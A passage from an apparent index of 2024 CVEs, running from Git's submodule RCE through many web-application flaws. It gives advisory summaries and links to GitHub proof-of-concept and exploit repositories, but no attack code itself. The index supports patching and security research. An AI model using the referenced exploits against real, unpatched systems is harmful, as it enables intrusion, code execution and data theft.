(2024-05-14) + +Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, repositories with submodules can be crafted in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a `.git/` directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. If symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. As always, it is best to avoid cloning repositories from untrusted sources. + + +- [markuta/CVE-2024-32002](https://github.com/markuta/CVE-2024-32002) +- [markuta/hooky](https://github.com/markuta/hooky) +- [amalmurali47/git_rce](https://github.com/amalmurali47/git_rce) +- [amalmurali47/hook](https://github.com/amalmurali47/hook) +- [M507/CVE-2024-32002](https://github.com/M507/CVE-2024-32002) +- [JakobTheDev/cve-2024-32002-submodule-rce](https://github.com/JakobTheDev/cve-2024-32002-submodule-rce) +- [JakobTheDev/cve-2024-32002-poc-rce](https://github.com/JakobTheDev/cve-2024-32002-poc-rce) +- [safebuffer/CVE-2024-32002](https://github.com/safebuffer/CVE-2024-32002) +- [10cks/CVE-2024-32002-POC](https://github.com/10cks/CVE-2024-32002-POC) +- [10cks/CVE-2024-32002-hulk](https://github.com/10cks/CVE-2024-32002-hulk) +- [10cks/CVE-2024-32002-submod](https://github.com/10cks/CVE-2024-32002-submod) +- [10cks/CVE-2024-32002-smash](https://github.com/10cks/CVE-2024-32002-smash) +- [10cks/CVE-2024-32002-linux-hulk](https://github.com/10cks/CVE-2024-32002-linux-hulk) +- [10cks/CVE-2024-32002-linux-submod](https://github.com/10cks/CVE-2024-32002-linux-submod) +- [10cks/CVE-2024-32002-linux-smash](https://github.com/10cks/CVE-2024-32002-linux-smash) +- [aitorcastel/poc_CVE-2024-32002](https://github.com/aitorcastel/poc_CVE-2024-32002) +- [aitorcastel/poc_CVE-2024-32002_submodule](https://github.com/aitorcastel/poc_CVE-2024-32002_submodule) +- [10cks/hook](https://github.com/10cks/hook) +- [jweny/CVE-2024-32002_HOOK](https://github.com/jweny/CVE-2024-32002_HOOK) +- [jweny/CVE-2024-32002_EXP](https://github.com/jweny/CVE-2024-32002_EXP) +- [CrackerCat/CVE-2024-32002_EXP](https://github.com/CrackerCat/CVE-2024-32002_EXP) +- [Roronoawjd/hook](https://github.com/Roronoawjd/hook) +- [Roronoawjd/git_rce](https://github.com/Roronoawjd/git_rce) +- [JJoosh/CVE-2024-32002-Reverse-Shell](https://github.com/JJoosh/CVE-2024-32002-Reverse-Shell) +- [1mxml/CVE-2024-32002-poc](https://github.com/1mxml/CVE-2024-32002-poc) +- [bfengj/CVE-2024-32002-hook](https://github.com/bfengj/CVE-2024-32002-hook) +- [ycdxsb/CVE-2024-32002-hulk](https://github.com/ycdxsb/CVE-2024-32002-hulk) +- [ycdxsb/CVE-2024-32002-submod](https://github.com/ycdxsb/CVE-2024-32002-submod) +- [bfengj/CVE-2024-32002-Exploit](https://github.com/bfengj/CVE-2024-32002-Exploit) +- [vincepsh/CVE-2024-32002](https://github.com/vincepsh/CVE-2024-32002) +- [vincepsh/CVE-2024-32002-hook](https://github.com/vincepsh/CVE-2024-32002-hook) +- [JJoosh/CVE-2024-32002](https://github.com/JJoosh/CVE-2024-32002) +- [10cks/CVE-2024-32002-EXP](https://github.com/10cks/CVE-2024-32002-EXP) +- [WOOOOONG/CVE-2024-32002](https://github.com/WOOOOONG/CVE-2024-32002) +- [WOOOOONG/hook](https://github.com/WOOOOONG/hook) +- [fadhilthomas/poc-cve-2024-32002](https://github.com/fadhilthomas/poc-cve-2024-32002) +- [fadhilthomas/hook](https://github.com/fadhilthomas/hook) +- [JakobTheDev/cve-2024-32002-submodule-aw](https://github.com/JakobTheDev/cve-2024-32002-submodule-aw) +- [JakobTheDev/cve-2024-32002-poc-aw](https://github.com/JakobTheDev/cve-2024-32002-poc-aw) +- [Goplush/CVE-2024-32002-git-rce](https://github.com/Goplush/CVE-2024-32002-git-rce) +- [431m/rcetest](https://github.com/431m/rcetest) +- [AD-Appledog/CVE-2024-32002](https://github.com/AD-Appledog/CVE-2024-32002) +- [AD-Appledog/wakuwaku](https://github.com/AD-Appledog/wakuwaku) +- [tobelight/cve_2024_32002](https://github.com/tobelight/cve_2024_32002) +- [Basyaact/CVE-2024-32002-PoC_Chinese](https://github.com/Basyaact/CVE-2024-32002-PoC_Chinese) +- [EQSTLab/git_rce](https://github.com/EQSTLab/git_rce) +- [sysonlai/CVE-2024-32002-hook](https://github.com/sysonlai/CVE-2024-32002-hook) +- [TSY244/CVE-2024-32002-git-rce-father-poc](https://github.com/TSY244/CVE-2024-32002-git-rce-father-poc) +- [TSY244/CVE-2024-32002-git-rce](https://github.com/TSY244/CVE-2024-32002-git-rce) +- [blackninja23/CVE-2024-32002](https://github.com/blackninja23/CVE-2024-32002) +- [daemon-reconfig/CVE-2024-32002](https://github.com/daemon-reconfig/CVE-2024-32002) +- [charlesgargasson/CVE-2024-32002](https://github.com/charlesgargasson/CVE-2024-32002) +- [NishanthAnand21/CVE-2024-32002-PoC](https://github.com/NishanthAnand21/CVE-2024-32002-PoC) +- [FlojBoj/CVE-2024-32002](https://github.com/FlojBoj/CVE-2024-32002) +- [tiyeume25112004/CVE-2024-32002](https://github.com/tiyeume25112004/CVE-2024-32002) +- [chrisWalker11/running-CVE-2024-32002-locally-for-tesing](https://github.com/chrisWalker11/running-CVE-2024-32002-locally-for-tesing) +- [sanan2004/CVE-2024-32002](https://github.com/sanan2004/CVE-2024-32002) +- [Masamuneee/hook](https://github.com/Masamuneee/hook) +- [Masamuneee/CVE-2024-32002-POC](https://github.com/Masamuneee/CVE-2024-32002-POC) +- [th4s1s/CVE-2024-32002-PoC](https://github.com/th4s1s/CVE-2024-32002-PoC) +- [Julian-gmz/hook_CVE-2024-32002](https://github.com/Julian-gmz/hook_CVE-2024-32002) +- [grecosamuel/CVE-2024-32002](https://github.com/grecosamuel/CVE-2024-32002) +- [XiaomingX/cve-2024-32002-poc](https://github.com/XiaomingX/cve-2024-32002-poc) + +### CVE-2024-32004 (2024-05-14) + +Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, an attacker can prepare a local repository in such a way that, when cloned, will execute arbitrary code during the operation. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. As a workaround, avoid cloning repositories from untrusted sources. + + +- [Wadewfsssss/CVE-2024-32004](https://github.com/Wadewfsssss/CVE-2024-32004) +- [10cks/CVE-2024-32004-POC](https://github.com/10cks/CVE-2024-32004-POC) + +### CVE-2024-32030 (2024-06-19) + +Kafka UI is an Open-Source Web UI for Apache Kafka Management. Kafka UI API allows users to connect to different Kafka brokers by specifying their network address and port. As a separate feature, it also provides the ability to monitor the performance of Kafka brokers by connecting to their JMX ports. JMX is based on the RMI protocol, so it is inherently susceptible to deserialization attacks. A potential attacker can exploit this feature by connecting Kafka UI backend to its own malicious broker. This vulnerability affects the deployments where one of the following occurs: 1. dynamic.config.enabled property is set in settings. It's not enabled by default, but it's suggested to be enabled in many tutorials for Kafka UI, including its own README.md. OR 2. an attacker has access to the Kafka cluster that is being connected to Kafka UI. In this scenario the attacker can exploit this vulnerability to expand their access and execute code on Kafka UI as well. Instead of setting up a legitimate JMX port, an attacker can create an RMI listener that returns a malicious serialized object for any RMI call. In the worst case it could lead to remote code execution as Kafka UI has the required gadget chains in its classpath. This issue may lead to post-auth remote code execution. This is particularly dangerous as Kafka-UI does not have authentication enabled by default. This issue has been addressed in version 0.7.2. All users are advised to upgrade. There are no known workarounds for this vulnerability. These issues were discovered and reported by the GitHub Security lab and is also tracked as GHSL-2023-230. + + +- [huseyinstif/CVE-2024-32030-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-32030-Nuclei-Template) + +### CVE-2024-32104 (2024-04-15) + +Cross-Site Request Forgery (CSRF) vulnerability in XLPlugins NextMove Lite.This issue affects NextMove Lite: from n/a through 2.18.1.\n\n + + +- [Cerberus-HiproPlus/CVE-2024-32104](https://github.com/Cerberus-HiproPlus/CVE-2024-32104) + +### CVE-2024-32113 (2024-05-08) + +Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13.\n\nUsers are recommended to upgrade to version 18.12.13, which fixes the issue.\n\n + + +- [RacerZ-fighting/CVE-2024-32113-POC](https://github.com/RacerZ-fighting/CVE-2024-32113-POC) +- [Mr-xn/CVE-2024-32113](https://github.com/Mr-xn/CVE-2024-32113) +- [YongYe-Security/CVE-2024-32113](https://github.com/YongYe-Security/CVE-2024-32113) + +### CVE-2024-32136 (2024-04-15) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Xenioushk BWL Advanced FAQ Manager.This issue affects BWL Advanced FAQ Manager: from n/a through 2.0.3.\n\n + + +- [xbz0n/CVE-2024-32136](https://github.com/xbz0n/CVE-2024-32136) + +### CVE-2024-32205 +- [Lucky-lm/CVE-2024-32205](https://github.com/Lucky-lm/CVE-2024-32205) + +### CVE-2024-32238 (2024-04-22) + +H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface. + + +- [asdfjkl11/CVE-2024-32238](https://github.com/asdfjkl11/CVE-2024-32238) +- [FuBoLuSec/CVE-2024-32238](https://github.com/FuBoLuSec/CVE-2024-32238) + +### CVE-2024-32258 (2024-04-23) + +The network server of fceux 2.7.0 has a path traversal vulnerability, allowing attackers to overwrite any files on the server without authentication by fake ROM. + + +- [liyansong2018/CVE-2024-32258](https://github.com/liyansong2018/CVE-2024-32258) + +### CVE-2024-32369 (2024-05-07) + +SQL Injection vulnerability in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a remote attacker to obtain sensitive information via a crafted payload to the start and limit parameter in the mliWhiteList.php component. + + +- [chucrutis/CVE-2024-32369](https://github.com/chucrutis/CVE-2024-32369) + +### CVE-2024-32370 (2024-05-07) + +An issue in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a remote attacker to obtain sensitive information via a crafted payload to the id parameter in the mliSystemUsers.php component. + + +- [chucrutis/CVE-2024-32370](https://github.com/chucrutis/CVE-2024-32370) + +### CVE-2024-32371 (2024-05-07) + +An issue in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a regular user account to escalate their privileges and gain administrative access by changing the type parameter from 1 to 0. + + +- [chucrutis/CVE-2024-32371](https://github.com/chucrutis/CVE-2024-32371) + +### CVE-2024-32399 (2024-04-22) + +Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component. + + +- [NN0b0dy/CVE-2024-32399](https://github.com/NN0b0dy/CVE-2024-32399) + +### CVE-2024-32459 (2024-04-22) + +FreeRDP is a free implementation of the Remote Desktop Protocol. FreeRDP based clients and servers that use a version of FreeRDP prior to 3.5.0 or 2.11.6 are vulnerable to out-of-bounds read. Versions 3.5.0 and 2.11.6 patch the issue. No known workarounds are available. + + +- [absholi7ly/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-](https://github.com/absholi7ly/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-) + +### CVE-2024-32523 (2024-05-17) + +Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in EverPress Mailster allows PHP Local File Inclusion.This issue affects Mailster: from n/a through 4.0.6. + + +- [truonghuuphuc/CVE-2024-32523-Poc](https://github.com/truonghuuphuc/CVE-2024-32523-Poc) + +### CVE-2024-32640 +- [Stuub/CVE-2024-32640-SQLI-MuraCMS](https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS) +- [0xYumeko/CVE-2024-32640-SQLI-MuraCMS](https://github.com/0xYumeko/CVE-2024-32640-SQLI-MuraCMS) +- [sammings/CVE-2024-32640](https://github.com/sammings/CVE-2024-32640) +- [pizza-power/CVE-2024-32640](https://github.com/pizza-power/CVE-2024-32640) + +### CVE-2024-32651 (2024-04-25) + +changedetection.io is an open source web page change detection, website watcher, restock monitor and notification service. There is a Server Side Template Injection (SSTI) in Jinja2 that allows Remote Command Execution on the server host. Attackers can run any system command without any restriction and they could use a reverse shell. The impact is critical as the attacker can completely takeover the server machine. This can be reduced if changedetection is behind a login page, but this isn't required by the application (not by default and not enforced). + + +- [zcrosman/cve-2024-32651](https://github.com/zcrosman/cve-2024-32651) +- [s0ck3t-s3c/CVE-2024-32651-changedetection-RCE](https://github.com/s0ck3t-s3c/CVE-2024-32651-changedetection-RCE) + +### CVE-2024-32700 (2024-05-13) + +Unrestricted Upload of File with Dangerous Type vulnerability in Kognetiks Kognetiks Chatbot for WordPress.This issue affects Kognetiks Chatbot for WordPress: from n/a through 2.0.0. + + +- [nastar-id/CVE-2024-32700](https://github.com/nastar-id/CVE-2024-32700) + +### CVE-2024-32709 (2024-04-24) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Plechev Andrey WP-Recall.This issue affects WP-Recall: from n/a through 16.26.5.\n\n + + +- [truonghuuphuc/CVE-2024-32709-Poc](https://github.com/truonghuuphuc/CVE-2024-32709-Poc) + +### CVE-2024-33111 (2024-05-06) + +D-Link DIR-845L router <=v1.01KRb03 is vulnerable to Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php. + + +- [FaLLenSKiLL1/CVE-2024-33111](https://github.com/FaLLenSKiLL1/CVE-2024-33111) + +### CVE-2024-33113 (2024-05-06) + +D-LINK DIR-845L <=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php. + + +- [FaLLenSKiLL1/CVE-2024-33113](https://github.com/FaLLenSKiLL1/CVE-2024-33113) +- [tekua/CVE-2024-33113](https://github.com/tekua/CVE-2024-33113) + +### CVE-2024-33209 (2024-10-02) + +FlatPress v1.3 is vulnerable to Cross Site Scripting (XSS). An attacker can inject malicious JavaScript code into the "Add New Entry" section, which allows them to execute arbitrary code in the context of a victim's web browser. + + +- [paragbagul111/CVE-2024-33209](https://github.com/paragbagul111/CVE-2024-33209) + +### CVE-2024-33210 (2024-10-02) + +A cross-site scripting (XSS) vulnerability has been identified in Flatpress 1.3. This vulnerability allows an attacker to inject malicious scripts into web pages viewed by other users. + + +- [paragbagul111/CVE-2024-33210](https://github.com/paragbagul111/CVE-2024-33210) + +### CVE-2024-33231 (2024-11-18) + +Cross Site Scripting vulnerability in Ferozo Email version 1.1 allows a local attacker to execute arbitrary code via a crafted payload to the PDF preview component. + + +- [fdzdev/CVE-2024-33231](https://github.com/fdzdev/CVE-2024-33231) + +### CVE-2024-33352 +- [mmiszczyk/CVE-2024-33352](https://github.com/mmiszczyk/CVE-2024-33352) + +### CVE-2024-33438 (2024-04-29) + +File Upload vulnerability in CubeCart before 6.5.5 allows an authenticated user to execute arbitrary code via a crafted .phar file. + + +- [julio-cfa/CVE-2024-33438](https://github.com/julio-cfa/CVE-2024-33438) + +### CVE-2024-33453 (2024-10-17) + +Buffer Overflow vulnerability in esp-idf v.5.1 allows a remote attacker to obtain sensitive information via the externalId component. + + +- [Ant1sec-ops/CVE-2024-33453](https://github.com/Ant1sec-ops/CVE-2024-33453) + +### CVE-2024-33559 (2024-04-29) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in 8theme XStore allows SQL Injection.This issue affects XStore: from n/a through 9.3.5.\n\n + + +- [absholi7ly/WordPress-XStore-theme-SQL-Injection](https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection) + +### CVE-2024-33644 (2024-05-17) + +Improper Control of Generation of Code ('Code Injection') vulnerability in WPCustomify Customify Site Library allows Code Injection.This issue affects Customify Site Library: from n/a through 0.0.9. + + +- [Akshath-Nagulapally/ReproducingCVEs_Akshath_Nagulapally](https://github.com/Akshath-Nagulapally/ReproducingCVEs_Akshath_Nagulapally) + +### CVE-2024-33722 +- [fuzzlove/soplanning-1.52-exploits](https://github.com/fuzzlove/soplanning-1.52-exploits) + +### CVE-2024-33775 (2024-05-01) + +An issue with the Autodiscover component in Nagios XI 2024R1.01 allows a remote attacker to escalate privileges via a crafted Dashlet. + + +- [Neo-XeD/CVE-2024-33775](https://github.com/Neo-XeD/CVE-2024-33775) + +### CVE-2024-33883 (2024-04-28) + +The ejs (aka Embedded JavaScript templates) package before 3.1.10 for Node.js lacks certain pollution protection. + + +- [Grantzile/PoC-CVE-2024-33883](https://github.com/Grantzile/PoC-CVE-2024-33883) + +### CVE-2024-33901 (-) + +Issue in KeePassXC 2.7.7 allows an attacker (who has the privileges of the victim) to recover some passwords stored in the .kdbx database via a memory dump. NOTE: the vendor disputes this because memory-management constraints make this unavoidable in the current design and other realistic designs. + + +- [gmikisilva/CVE-2024-33901-ProofOfConcept](https://github.com/gmikisilva/CVE-2024-33901-ProofOfConcept) + +### CVE-2024-33911 (2024-05-02) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Weblizar School Management Pro.This issue affects School Management Pro: from n/a through 10.3.4.\n\n + + +- [xbz0n/CVE-2024-33911](https://github.com/xbz0n/CVE-2024-33911) + +### CVE-2024-34102 (2024-06-13) + +Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction. + + +- [ArturArz1/TestCVE-2024-34102](https://github.com/ArturArz1/TestCVE-2024-34102) +- [th3gokul/CVE-2024-34102](https://github.com/th3gokul/CVE-2024-34102) +- [bigb0x/CVE-2024-34102](https://github.com/bigb0x/CVE-2024-34102) +- [11whoami99/CVE-2024-34102](https://github.com/11whoami99/CVE-2024-34102) +- [d0rb/CVE-2024-34102](https://github.com/d0rb/CVE-2024-34102) +- [Chocapikk/CVE-2024-34102](https://github.com/Chocapikk/CVE-2024-34102) +- [0x0d3ad/CVE-2024-34102](https://github.com/0x0d3ad/CVE-2024-34102) +- [cmsec423/CVE-2024-34102](https://github.com/cmsec423/CVE-2024-34102) +- [cmsec423/Magento-XXE-CVE-2024-34102](https://github.com/cmsec423/Magento-XXE-CVE-2024-34102) +- [jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento](https://github.com/jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento) +- [SamJUK/cosmicsting-validator](https://github.com/SamJUK/cosmicsting-validator) +- [unknownzerobit/poc](https://github.com/unknownzerobit/poc) +- [crynomore/CVE-2024-34102](https://github.com/crynomore/CVE-2024-34102) +- [bughuntar/CVE-2024-34102](https://github.com/bughuntar/CVE-2024-34102) +- [bughuntar/CVE-2024-34102-Python](https://github.com/bughuntar/CVE-2024-34102-Python) +- [Phantom-IN/CVE-2024-34102](https://github.com/Phantom-IN/CVE-2024-34102) +- [wubinworks/magento2-cosmic-sting-patch](https://github.com/wubinworks/magento2-cosmic-sting-patch) +- [EQSTLab/CVE-2024-34102](https://github.com/EQSTLab/CVE-2024-34102) +- [dream434/CVE-2024-34102](https://github.com/dream434/CVE-2024-34102) +- [bka/magento-cve-2024-34102-exploit-cosmicstring](https://github.com/bka/magento-cve-2024-34102-exploit-cosmicstring) + +### CVE-2024-34144 (2024-05-02) + +A sandbox bypass vulnerability involving crafted constructor bodies in Jenkins Script Security Plugin 1335.vf07d9ce377a_e and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM. + + +- [MXWXZ/CVE-2024-34144](https://github.com/MXWXZ/CVE-2024-34144) + +### CVE-2024-34220 (-) + +Sourcecodester Human Resource Management System 1.0 is vulnerable to SQL Injection via the 'leave' parameter. + + +- [dovankha/CVE-2024-34220](https://github.com/dovankha/CVE-2024-34220) + +### CVE-2024-34221 (-) + +Sourcecodester Human Resource Management System 1.0 is vulnerable to Insecure Permissions resulting in privilege escalation. + + +- [dovankha/CVE-2024-34221](https://github.com/dovankha/CVE-2024-34221) + +### CVE-2024-34222 (-) + +Sourcecodester Human Resource Management System 1.0 is vulnerable to SQL Injection via the searccountry parameter. + + +- [dovankha/CVE-2024-34222](https://github.com/dovankha/CVE-2024-34222) + +### CVE-2024-34223 (-) + +Insecure permission vulnerability in /hrm/leaverequest.php in SourceCodester Human Resource Management System 1.0 allow attackers to approve or reject leave ticket. + + +- [dovankha/CVE-2024-34223](https://github.com/dovankha/CVE-2024-34223) + +### CVE-2024-34224 (-) + +Cross Site Scripting vulnerability in /php-lms/classes/Users.php?f=save in Computer Laboratory Management System using PHP and MySQL 1.0 allow remote attackers to inject arbitrary web script or HTML via the firstname, middlename, lastname parameters. + + +- [dovankha/CVE-2024-34224](https://github.com/dovankha/CVE-2024-34224) + +### CVE-2024-34225 (-) + +Cross Site Scripting vulnerability in php-lms/admin/?page=system_info in Computer Laboratory Management System using PHP and MySQL 1.0 allow remote attackers to inject arbitrary web script or HTML via the name, shortname parameters. + + +- [dovankha/CVE-2024-34225](https://github.com/dovankha/CVE-2024-34225) + +### CVE-2024-34226 (-) + +SQL injection vulnerability in /php-sqlite-vms/?page=manage_visitor&id=1 in SourceCodester Visitor Management System 1.0 allow attackers to execute arbitrary SQL commands via the id parameters. + + +- [dovankha/CVE-2024-34226](https://github.com/dovankha/CVE-2024-34226) + +### CVE-2024-34310 (-) + +Jin Fang Times Content Management System v3.2.3 was discovered to contain a SQL injection vulnerability via the id parameter. + + +- [3309899621/CVE-2024-34310](https://github.com/3309899621/CVE-2024-34310) + +### CVE-2024-34312 (2024-06-24) + +Virtual Programming Lab for Moodle up to v4.2.3 was discovered to contain a cross-site scripting (XSS) vulnerability via the component vplide.js. + + +- [vincentscode/CVE-2024-34312](https://github.com/vincentscode/CVE-2024-34312) + +### CVE-2024-34313 (2024-06-24) + +An issue in VPL Jail System up to v4.0.2 allows attackers to execute a directory traversal via a crafted request to a public endpoint. + + +- [vincentscode/CVE-2024-34313](https://github.com/vincentscode/CVE-2024-34313) + +### CVE-2024-34329 (2024-07-22) + +Insecure permissions in Entrust Datacard XPS Card Printer Driver 8.4 and earlier allows unauthenticated attackers to execute arbitrary code as SYSTEM via a crafted DLL payload. + + +- [pamoutaf/CVE-2024-34329](https://github.com/pamoutaf/CVE-2024-34329) + +### CVE-2024-34350 (2024-05-09) + +Next.js is a React framework that can provide building blocks to create web applications. Prior to 13.5.1, an inconsistent interpretation of a crafted HTTP request meant that requests are treated as both a single request, and two separate requests by Next.js, leading to desynchronized responses. This led to a response queue poisoning vulnerability in the affected Next.js versions. For a request to be exploitable, the affected route also had to be making use of the [rewrites](https://nextjs.org/docs/app/api-reference/next-config-js/rewrites) feature in Next.js. The vulnerability is resolved in Next.js `13.5.1` and newer. + + +- [Sudistark/rewrites-nextjs-CVE-2024-34350](https://github.com/Sudistark/rewrites-nextjs-CVE-2024-34350) + +### CVE-2024-34351 (2024-05-09) + +Next.js is a React framework that can provide building blocks to create web applications. A Server-Side Request Forgery (SSRF) vulnerability was identified in Next.js Server Actions. If the `Host` header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself. The required conditions are 1) Next.js is running in a self-hosted manner; 2) the Next.js application makes use of Server Actions; and 3) the Server Action performs a redirect to a relative path which starts with a `/`. This vulnerability was fixed in Next.js `14.1.1`. + + +- [Voorivex/CVE-2024-34351](https://github.com/Voorivex/CVE-2024-34351) +- [avergnaud/Next.js_exploit_CVE-2024-34351](https://github.com/avergnaud/Next.js_exploit_CVE-2024-34351) +- [God4n/nextjs-CVE-2024-34351-_exploit](https://github.com/God4n/nextjs-CVE-2024-34351-_exploit) + +### CVE-2024-34361 (2024-07-05) + +Pi-hole is a DNS sinkhole that protects devices from unwanted content without installing any client-side software. A vulnerability in versions prior to 5.18.3 allows an authenticated user to make internal requests to the server via the `gravity_DownloadBlocklistFromUrl()` function. Depending on some circumstances, the vulnerability could lead to remote command execution. Version 5.18.3 contains a patch for this issue. + + +- [T0X1Cx/CVE-2024-34361-PiHole-SSRF-to-RCE](https://github.com/T0X1Cx/CVE-2024-34361-PiHole-SSRF-to-RCE) + +### CVE-2024-34452 (2024-06-21) + +CMSimple_XH 1.7.6 allows XSS by uploading a crafted SVG document. + + +- [surajhacx/CVE-2024-34452](https://github.com/surajhacx/CVE-2024-34452) + +### CVE-2024-34463 (2024-09-03) + +BPL Personal Weighing Scale PWS-01BT IND/09/18/599 devices send sensitive information in unencrypted BLE packets. (The packet data also lacks authentication and integrity protection.) + + +- [yash-chandna/CVE-2024-34463](https://github.com/yash-chandna/CVE-2024-34463) + +### CVE-2024-34469 (2024-05-04) + +Rukovoditel before 3.5.3 allows XSS via user_photo to index.php?module=users/registration&action=save. + + +- [Toxich4/CVE-2024-34469](https://github.com/Toxich4/CVE-2024-34469) + +### CVE-2024-34470 (2024-05-06) + +An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An Unauthenticated Path Traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server. + + +- [osvaldotenorio/CVE-2024-34470](https://github.com/osvaldotenorio/CVE-2024-34470) +- [bigb0x/CVE-2024-34470](https://github.com/bigb0x/CVE-2024-34470) +- [Cappricio-Securities/CVE-2024-34470](https://github.com/Cappricio-Securities/CVE-2024-34470) +- [Mr-r00t11/CVE-2024-34470](https://github.com/Mr-r00t11/CVE-2024-34470) +- [th3gokul/CVE-2024-34470](https://github.com/th3gokul/CVE-2024-34470) + +### CVE-2024-34471 (2024-05-06) + +An issue was discovered in HSC Mailinspector 5.2.17-3. A Path Traversal vulnerability (resulting in file deletion) exists in the mliRealtimeEmails.php file. The filename parameter in the export HTML functionality does not properly validate the file location, allowing an attacker to read and delete arbitrary files on the server. This was observed when the mliRealtimeEmails.php file itself was read and subsequently deleted, resulting in a 404 error for the file and disruption of email information loading. + + +- [osvaldotenorio/CVE-2024-34471](https://github.com/osvaldotenorio/CVE-2024-34471) + +### CVE-2024-34472 (2024-05-06) + +An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An authenticated blind SQL injection vulnerability exists in the mliRealtimeEmails.php file. The ordemGrid parameter in a POST request to /mailinspector/mliRealtimeEmails.php does not properly sanitize input, allowing an authenticated attacker to execute arbitrary SQL commands, leading to the potential disclosure of the entire application database. + + +- [osvaldotenorio/CVE-2024-34472](https://github.com/osvaldotenorio/CVE-2024-34472) + +### CVE-2024-34474 (2024-05-05) + +Clario through 2024-04-11 for Desktop has weak permissions for %PROGRAMDATA%\Clario and tries to load DLLs from there as SYSTEM. + + +- [Alaatk/CVE-2024-34474](https://github.com/Alaatk/CVE-2024-34474) + +### CVE-2024-34582 (-) + +Sunhillo SureLine through 8.10.0 on RICI 5000 devices allows cgi/usrPasswd.cgi userid_change XSS within the Forgot Password feature. + + +- [silent6trinity/CVE-2024-34582](https://github.com/silent6trinity/CVE-2024-34582) + +### CVE-2024-34693 (2024-06-20) + +Improper Input Validation vulnerability in Apache Superset, allows for an authenticated attacker to create a MariaDB connection with local_infile enabled. If both the MariaDB server (off by default) and the local mysql client on the web server are set to allow for local infile, it's possible for the attacker to execute a specific MySQL/MariaDB SQL command that is able to read files from the server and insert their content on a MariaDB database table.This issue affects Apache Superset: before 3.1.3 and version 4.0.0\n\nUsers are recommended to upgrade to version 4.0.1 or 3.1.3, which fixes the issue.\n\n + + +- [mbadanoiu/CVE-2024-34693](https://github.com/mbadanoiu/CVE-2024-34693) +- [Mr-r00t11/CVE-2024-34693](https://github.com/Mr-r00t11/CVE-2024-34693) + +### CVE-2024-34716 (2024-05-14) + +PrestaShop is an open source e-commerce web application. A cross-site scripting (XSS) vulnerability that only affects PrestaShops with customer-thread feature flag enabled is present starting from PrestaShop 8.1.0 and prior to PrestaShop 8.1.6. When the customer thread feature flag is enabled through the front-office contact form, a hacker can upload a malicious file containing an XSS that will be executed when an admin opens the attached file in back office. The script injected can access the session and the security token, which allows it to perform any authenticated action in the scope of the administrator's right. This vulnerability is patched in 8.1.6. A workaround is to disable the customer-thread feature-flag. + + +- [aelmokhtar/CVE-2024-34716](https://github.com/aelmokhtar/CVE-2024-34716) +- [0xDTC/Prestashop-CVE-2024-34716](https://github.com/0xDTC/Prestashop-CVE-2024-34716) + +### CVE-2024-34739 (2024-08-15) + +In shouldRestrictOverlayActivities of UsbProfileGroupSettingsManager.java, there is a possible escape from SUW due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. + + +- [uthrasri/CVE-2024-34739](https://github.com/uthrasri/CVE-2024-34739) + +### CVE-2024-34741 (2024-08-15) + +In setForceHideNonSystemOverlayWindowIfNeeded of WindowState.java, there is a possible way for message content to be visible on the screensaver while lock screen visibility settings are restricted by the user due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [uthrasri/CVE-2024-34741](https://github.com/uthrasri/CVE-2024-34741) + +### CVE-2024-34831 (2024-09-10) + +cross-site scripting (XSS) vulnerability in Gibbon Core v26.0.00 allows an attacker to execute arbitrary code via the imageLink parameter in the library_manage_catalog_editProcess.php component. + + +- [enzored/CVE-2024-34831](https://github.com/enzored/CVE-2024-34831) + +### CVE-2024-34832 (-) + +Directory Traversal vulnerability in CubeCart v.6.5.5 and before allows an attacker to execute arbitrary code via a crafted file uploaded to the _g and node parameters. + + +- 